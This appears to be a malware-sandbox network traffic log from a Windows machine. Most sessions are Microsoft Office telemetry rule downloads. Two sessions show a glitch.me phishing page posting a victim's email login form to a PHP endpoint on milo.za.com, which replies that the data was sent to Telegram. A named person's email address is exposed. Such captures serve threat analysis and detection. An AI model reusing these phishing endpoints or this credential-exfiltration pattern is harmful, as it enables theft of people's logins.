                                                                                                                                    2024-11-05 08:03:14 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    25192.168.2.44978913.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:14 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:14 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 407
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                    ETag: "0x8DC582B9698189B"
                                                                                                                                    x-ms-request-id: 676680a8-d01e-0082-1c5c-2ee489000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080314Z-158dbd74bf4qgfthhC1SN1tv8800000003t0000000001gsp
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:14 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    26192.168.2.449793188.114.96.34435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:15 UTC705OUTPOST //pood/phpp4all.php HTTP/1.1
                                                                                                                                    Host: milo.za.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Content-Length: 260
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPiXLTejpWOLfxxWf
                                                                                                                                    Accept: */*
                                                                                                                                    Origin: https://astonishing-maize-sunstone.glitch.me
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:15 UTC260OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 50 69 58 4c 54 65 6a 70 57 4f 4c 66 78 78 57 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 0d 0a 0d 0a 4d 61 74 74 68 65 77 2e 48 61 72 64 69 6e 67 40 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 50 69 58 4c 54 65 6a 70 57 4f 4c 66 78 78 57 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 70 77 64 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 50 69 58 4c 54 65 6a 70 57 4f 4c 66 78 78 57
                                                                                                                                    Data Ascii: ------WebKitFormBoundaryPiXLTejpWOLfxxWfContent-Disposition: form-data; name="userid"Matthew.Harding@elders.com.au------WebKitFormBoundaryPiXLTejpWOLfxxWfContent-Disposition: form-data; name="userpwd"------WebKitFormBoundaryPiXLTejpWOLfxxW
                                                                                                                                    2024-11-05 08:03:15 UTC875INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:15 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BCYQf2WXqqv2eaoP12%2BrWlB0R%2FKw0ZufYcn6hMOtBCBnz0bO7sD8O2cMCL6AbhJXBQpaSltIx4UKp71epDh%2FosQuVnzWDJXdM5UgwCS0V0PA4CqVB3rgN%2FdgL2SBiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb5383dcd06b94-DFW
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2106&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1565&delivery_rate=1568797&cwnd=239&unsent_bytes=0&cid=b9731f31dd9dd705&ts=813&x=0"
                                                                                                                                    2024-11-05 08:03:15 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                    Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                    2024-11-05 08:03:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    27192.168.2.44979213.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:15 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:15 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 477
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                    ETag: "0x8DC582BB8CEAC16"
                                                                                                                                    x-ms-request-id: 23d3b202-401e-0083-108e-2d075c000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080315Z-158dbd74bf4tx46ghC1SN1t6pc00000003ng000000003y29
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:15 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    28192.168.2.44979013.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:15 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:15 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 469
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                    ETag: "0x8DC582BBA701121"
                                                                                                                                    x-ms-request-id: bfc5cfc9-a01e-0070-0546-2e573b000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080315Z-157b9fd754f292rnhC1SN1u8us00000004100000000075v4
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:15 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    29192.168.2.44979413.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:15 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:15 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 464
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                    ETag: "0x8DC582B97FB6C3C"
                                                                                                                                    x-ms-request-id: 9ed27c23-f01e-0020-6955-2e956b000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080315Z-158dbd74bf4x6xt2hC1SN1quas00000003t0000000002zsy
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:15 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    30192.168.2.44979113.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:15 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:15 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 415
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                    ETag: "0x8DC582BA41997E3"
                                                                                                                                    x-ms-request-id: c6ee189f-401e-000a-354b-2e4a7b000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080315Z-158dbd74bf4kd595hC1SN1av8c00000003tg0000000019ex
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:15 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    31192.168.2.44979513.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:15 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:15 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 494
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                    ETag: "0x8DC582BB7010D66"
                                                                                                                                    x-ms-request-id: ea225b5e-301e-0020-755f-2e6299000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080315Z-158dbd74bf4cvrq6hC1SN1zhyc00000003m000000000408r
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:15 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    32192.168.2.449801188.114.97.34435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:16 UTC353OUTGET //pood/phpp4all.php HTTP/1.1
                                                                                                                                    Host: milo.za.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:17 UTC872INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWZnHK9kJFdaunl%2FHVBHIekZi2DL%2FAiPbxnS0gdNupQ0mkYt9TX2vd3jQHyuYLg3CR2nFwBihZfqDNWMDCl3DRFyjc2t7x4qKwogDvSIdsJw%2FuFXBIlBaZuFjFcThw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb538c4f753ac4-DFW
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1000&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=931&delivery_rate=2779270&cwnd=250&unsent_bytes=0&cid=70214cc3e0431695&ts=662&x=0"
                                                                                                                                    2024-11-05 08:03:17 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                    Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                    2024-11-05 08:03:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    33192.168.2.44980013.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:16 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:16 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 428
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                    ETag: "0x8DC582BAC4F34CA"
                                                                                                                                    x-ms-request-id: 2398beba-501e-007b-298e-2d5ba2000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080316Z-158dbd74bf4rjfxfhC1SN1a43800000003tg0000000002u4
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:16 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
